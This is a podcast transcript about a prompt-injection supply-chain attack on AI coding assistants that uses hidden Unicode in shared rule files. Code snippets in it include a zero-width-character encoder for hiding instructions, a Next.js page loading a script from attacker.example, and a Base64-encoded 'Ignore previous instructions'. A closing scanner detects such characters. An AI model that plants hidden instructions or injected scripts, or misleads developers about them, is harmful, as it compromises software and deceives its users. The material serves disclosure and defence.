Research Saturday 6.14.25
Ep 381 | 6.14.25

Hiding in plain sight with vibe coding.

Transcript

[ Music ]

Dave Bittner: Hello, everyone, and welcome to the CyberWire's "Research Saturday." I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down the threats and vulnerabilities, solving some of the hard problems, and protecting ourselves in our rapidly evolving cyberspace. Thanks for joining us. [ Music ]

 

Ziv Karliner: At Pillar Security, we've spent the last year and a half with emerging attack vectors that put AI-powered applications at risk. So, first of all, we got to learn and get our hands around new attack vectors such as prompt injection, indirect injections, and all sorts of evasion techniques that make these attacks basically invisible to the human eye and to most of the security tools out there.

 

Dave Bittner: That's Ziv Karliner, Pillar Security's Co-Founder and CTO. The research we're discussing today is titled "New Vulnerability in GitHub Copilot and Cursor: How Hackers Can Weaponize Code Agents." [ Music ]

 

Ziv Karliner: So take that together with the fact that we ourselves are utilizing these amazing coding copilots, which have LLMs at their base. That got us, you know, thinking about the combination of the new attack vectors with what is, I would say, one of the most popular use cases for AI-powered applications, which is coding assistants, and it sparked our imagination about what can potentially go wrong.

 

Dave Bittner: Well, at the root of this is what you all refer to as the Rules File Backdoor. Can you describe that for us? What exactly are we talking about here?

 

Ziv Karliner: Sure. So maybe one step back. What are rule files? Think about coding agents these days. You can think about them as another engineer, a developer who joined the team and now helps you complete a project much quicker. So rule files are basically a way to onboard the coding agent to your project, to your team -- to tell it what best practices are used in the project, what software stack we're using, specific syntax, or any guidance and context that is relevant just to the project we're working on right now. So think about the first day on the job for a new developer who joins the team. That's what rule files are: basically, text files that these coding assistants allow users to define, containing all of the examples and instructions for how to write code in the way that best suits the project in scope. So these are rule files. The interesting thing, when you think about it, is that this is basically context -- additional context that is being fed into the conversation flow with the coding agent. And really, it's part of the instruction layer, the context layer that is taken into account when the model takes a request to write new code. This context is added to the request before the developer gets back the code suggestions and edits. So a Rules File Backdoor is basically when attackers can embed malicious instructions in this context that affect any code generated by the coding assistant, to create actual backdoors in the generated code. That's what we've shown in our example. On its own, it sounds, you know, pretty straightforward, maybe, to protect against. But what we uncovered in our research is that, first of all, you have marketplaces -- open source marketplaces where rule files are being shared between organizations -- which creates a supply chain vector. Combine that with the fact that you can add hidden instructions, and that's, I would say, the second risky part here. There is a technique called hidden Unicode characters, which basically means that when developers look at the rule file, it looks completely legitimate, but it actually contains hidden instructions that only the AI agent understands and acts on. So that's really, I would say, the perfect scenario where you can hide in plain sight in some of these marketplaces and compromise the developers who are taking these rule files to improve their projects.
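
To make the hidden-instruction idea concrete, here is a minimal TypeScript sketch of how text can be tucked into zero-width Unicode characters, so that a rule file renders normally in an editor while still carrying extra content in its raw codepoints. The specific characters, the bit encoding, and the example strings are illustrative assumptions for this sketch, not the exact technique from Pillar's research.

```typescript
// Illustrative only: hiding text inside zero-width Unicode characters so it is
// invisible in most editors and diffs, while still present in the codepoints an
// LLM receives. Handles BMP characters only, for brevity.

const ZERO = "\u200B"; // zero-width space      -> bit 0
const ONE = "\u200C";  // zero-width non-joiner -> bit 1

// Encode an arbitrary string as a run of invisible characters.
function hide(message: string): string {
  return [...message]
    .map((ch) => ch.codePointAt(0)!.toString(2).padStart(16, "0"))
    .join("")
    .split("")
    .map((bit) => (bit === "0" ? ZERO : ONE))
    .join("");
}

// Recover the hidden string from the invisible run.
function reveal(hidden: string): string {
  const bits = [...hidden].map((ch) => (ch === ZERO ? "0" : "1")).join("");
  let out = "";
  for (let i = 0; i + 16 <= bits.length; i += 16) {
    out += String.fromCodePoint(parseInt(bits.slice(i, i + 16), 2));
  }
  return out;
}

// A rule file line that renders as an ordinary best-practices note...
const visibleRule = "Always prefer functional React components in this project.";
// ...but carries an extra payload a human reviewer never sees on screen.
const poisonedRule = visibleRule + hide("(hypothetical hidden instruction)");

console.log(poisonedRule.length > visibleRule.length);        // true -- the codepoints are there
console.log(reveal(poisonedRule.slice(visibleRule.length)));  // "(hypothetical hidden instruction)"
```

A casual code review or a diff viewer without hidden-character warnings sees only the visible sentence, while a model that consumes the file receives every codepoint.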

 

Dave Bittner: Well, can we walk through an example here? I mean, suppose an attacker wants to make use of this. Let's go through the process of how they would go about doing that.

 

Ziv Karliner: For sure. So, in our research, we walked through a simple, step-by-step example. So, for instance, let's think about an attacker who wants to compromise any Next.js application. And how can you do that? Basically, the marketplaces for rule files have directories -- you can think of it as a directory for every available coding stack. And you can actually commit and add suggestions to these marketplaces, these hubs of rule files that are being shared between developers. So let's take the Next.js example. I, as an attacker, will go to this repo. I will craft a legitimate-looking instruction file about Next.js best practices. And I will embed hidden text into this file using the hidden Unicode characters technique. And I'll commit this, let's say, to GitHub or, via some kind of a web form, to this marketplace. What we also uncovered during the research is that in GitHub itself, it was invisible. Basically, when you commit code that contains these hidden instructions, a developer who is now going to approve this addition request is not going to see anything, is not going to get alerted. This is actually something that was solved by GitHub early this month in one of the vulnerability patches. So now we have this rule file with hidden instructions live on GitHub. An unsuspecting developer who wants to get better results on his coding project when using Cursor or GitHub Copilot basically copies this file and adds it to his own project -- also sharing it with his team, just in order to improve the quality of code for the full team. And now, when he requests, let's say, the addition of a simple page to his application, the rule file -- which contains instructions to add, basically, malicious JavaScript code to each new HTML file that is created -- kicks in. It happens only when the agent loads this file, takes in the additional hidden instructions, and generates the additional code on the fly. Now, the interesting thing that we showed in our research paper is that in the attack itself, in the malicious instructions, an attacker could also use the agent's intelligence to their advantage. So what we've shown is that a developer can then ask, "Hey, why was this code snippet added to the code that was generated?" And the AI agent will say, "Oh, this is the security best practice of our organization." So the attacker's instructions could be used not only to inject malicious code; they're also used to trick the user, kind of social engineer them, into believing that this was the goal in the first place. So this is utilizing the AI agent's intelligence against the end user. This was, I would say, the most interesting finding for us. [ Music ]
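
For a sense of what that end result could look like, here is a hypothetical TypeScript (TSX) sketch of a generated Next.js page: the component the developer asked for, next to a poisoned variant where the hidden rule-file instructions have slipped in one extra remote script. The component names and the attacker domain are invented for illustration; the actual payload in the research differs.

```tsx
// What the developer expects the assistant to generate for "a simple about page":
export function AboutPage() {
  return (
    <main>
      <h1>About us</h1>
      <p>We build developer tools.</p>
    </main>
  );
}

// What a poisoned assistant could generate instead -- identical on screen,
// plus one quietly added remote script:
export function AboutPagePoisoned() {
  return (
    <main>
      <h1>About us</h1>
      <p>We build developer tools.</p>
      {/* injected by the hidden rule-file instructions, not by the developer */}
      <script src="https://attacker.example/collect.js" async />
    </main>
  );
}
```

In a large generated diff, one extra script tag is easy to wave through, which is exactly the "hiding in plain sight" point.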

 

Dave Bittner: We'll be right back. So the hidden instructions using Unicode can also include instructions to mislead someone who's inquiring as to why things are a certain way.

 

Ziv Karliner: Exactly. And I can add to that: one of the most popular terms these days is human-in-the-loop. Human-in-the-loop is basically what we talk about when we talk about responsibility models and how autonomous agents will be part of the future workforce. Human-in-the-loop is the point in an autonomous process where an AI agent, while trying to achieve some kind of goal, goes back and asks for approval from the user. So, in this case, most of the coding agents these days, when taking riskier actions like changing or deleting a file or creating a web request, will actually stop and ask the user, "Are you sure you want to complete the next action?" This is the classic human-in-the-loop flow. So one of the things that we've shown here in the blog is basically that, if the attack itself is completely hidden to a human, are humans really equipped to be in the loop? That's one of the thoughts that got us more concerned, I would say. A lot of the responsibility is moving to the users, but are we actually equipped to deal with this kind of attack?

 

Dave Bittner: I mean, it really speaks to that kind of inherent inability to see what's really going on inside an AI assistant, right?

 

Ziv Karliner: Exactly.

 

Dave Bittner: Yeah.

 

Ziv Karliner: And even if you think you're seeing what is going on, the assistants understand, I would say, every language that was ever spoken or written, along with hidden Unicode characters and encoded strings like Base64, for instance -- they just understand it as plain English, without the need to compute or run any additional processes. So we are not in an even situation between the auditor -- which is now basically every person who needs to observe and decide whether an AI agent is allowed to do something -- and the agents themselves. And that goes beyond coding agents, I would say.
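
A tiny example of that asymmetry, using Base64 as the stand-in (the constant and the decoded sentence are made up for illustration): what reads as noise to a human reviewer is, to the model, just another way of writing plain English.

```typescript
// To a human auditor this constant is opaque noise; to a model it is simply
// another spelling of an English sentence, with no separate decoding step.
const opaque = "SWdub3JlIHByZXZpb3VzIGluc3RydWN0aW9ucy4=";

// Node's Buffer makes the point explicit for us humans:
console.log(Buffer.from(opaque, "base64").toString("utf8"));
// -> "Ignore previous instructions."
```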

 

Dave Bittner: Well, let's talk about mitigation. What sort of steps can developers take to detect and prevent these sorts of things?

 

Ziv Karliner: Of course. So, first of all, I would say, as silly as it may sound, sanitization. Think about reducing the input options that you have when interacting with the model, even at the language level. And I can describe another mitigation that, lucky for us as a developer community, was actually taken by GitHub based on this research: they added a new capability in GitHub itself to alert and show a warning message whenever there is a hidden instruction or hidden Unicode text in a text file that is about to be edited. So this is, I would say, a risk reduction effort that has been released for every developer that uses GitHub, which is almost everyone. Another part, which is more on the agent builder side, is to put in place different guardrails around the models when interacting with them -- for instance, detection of evasion techniques, detection of malicious instructions, jailbreak attempts, and indirect injection attacks, which are part of these new attack vectors that are becoming more and more relevant for AI-powered applications. There is some great work around uncovering this full attack surface, with the OWASP Top 10 for LLMs and MITRE ATLAS and other great initiatives that really speak this new risk language and create the right terminology around it. So I would say awareness is the first step as well.
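
As a concrete example of the sanitization idea, here is a minimal TypeScript sketch of a pre-commit-style check that flags zero-width and bidirectional control characters in rule files before they are shared. The character ranges and the command-line wiring are assumptions for this sketch; GitHub's built-in warning and dedicated guardrail tooling go further than this.

```typescript
import { readFileSync } from "node:fs";

// Invisible and text-reordering characters that have no business in a plain-text
// rule file. This list is a starting point for the sketch, not an exhaustive
// catalogue of abusable codepoints.
const SUSPICIOUS =
  /[\u200B-\u200F\u202A-\u202E\u2060-\u2064\uFEFF\u{E0000}-\u{E007F}]/gu;

// Print a warning for every hidden character found, with file, line, and column.
export function scanRuleFile(path: string): void {
  const lines = readFileSync(path, "utf8").split("\n");
  lines.forEach((line, i) => {
    for (const match of line.matchAll(SUSPICIOUS)) {
      const cp = match[0].codePointAt(0)!.toString(16).toUpperCase();
      console.warn(
        `${path}:${i + 1}:${(match.index ?? 0) + 1} hidden character U+${cp}`
      );
    }
  });
}

// Example wiring: scan every rule file passed on the command line.
for (const file of process.argv.slice(2)) {
  scanRuleFile(file);
}
```

Run over whatever rule files a team keeps in its repo, in CI or a pre-commit hook, this gives a human reviewer the alert that their editor doesn't.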

 

Dave Bittner: What do you suppose this vulnerability reveals about the current state of things when it comes to AI integration and software development, which -- I mean, I think it's fair to say there's a lot of enthusiasm for it? It's certainly a powerful tool, and yet we have these things. I mean, is it still early enough days that these things are important to consider as we go forward?

 

Ziv Karliner: For sure. So we're still in the early days, but I would say, coming myself from the cloud security space and also the software supply chain security space, we've had amazing progress with software supply chain security over the last decade, with SBOMs becoming a standard and the vulnerability programs, you know. We put a lot of guardrails inside the CI/CD pipelines and built, I would say, a lot of awareness around it. And on the other hand, we now have this amazing phenomenon of -- I would call it the intelligence age, the AI transformation -- that doesn't leave any vertical in the industry or any role untouched, but it's moving really fast. So there is kind of a challenge here, where the attack vectors are being discovered as we go, but adoption is moving faster than I have ever seen in my career. For the security industry in general, you see a lot of awareness, a lot of community effort to surface these new emerging threats, even before we've seen these attack vectors being utilized in the wild. I can give an example: one of the accelerators for safer CI/CD pipelines was SolarWinds, which we're all familiar with. That really hasn't happened yet in the AI security space. I guess, as always, it's a matter of time until something becomes more public, because the pace of adoption is only accelerating, I would say. And the opportunities -- I would say there are great opportunities these days for, you know, developer teams to move much faster and build even higher quality code if they utilize these tools in the right ways, with the right context. But I would say human supervision is still much needed, especially with the right security expertise. And in order to do that, ourselves as a company, one of our main goals is to help increase awareness with this type of research, and also, I would say, to put more effort into the responsibility question, right? Who is really responsible for the security issues at hand? Is it the developers who utilize these amazing tools? Is it the tool builders? The model providers? There are a few different players here trying to put these new risks under control. And it's, I would say, a work in progress. [ Music ]

 

Dave Bittner: Our thanks to Ziv Karliner from Pillar Security for joining us. The research is titled "New Vulnerability in GitHub Copilot and Cursor: How Hackers Can Weaponize Code Agents." We'll have a link in the show notes. And that's "Research Saturday" brought to you by N2K CyberWire. We'd love to hear from you. We're conducting our annual audience survey to learn more about our listeners. We're collecting your insights through August 31 of this year. There's a link in the show notes. We hope you'll check it out. This episode was produced by Liz Stokes. We're mixed by Elliott Peltzman and Trey Hester. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher. And I'm Dave Bittner. Thanks for listening. We'll see you back here next time. [ Music ]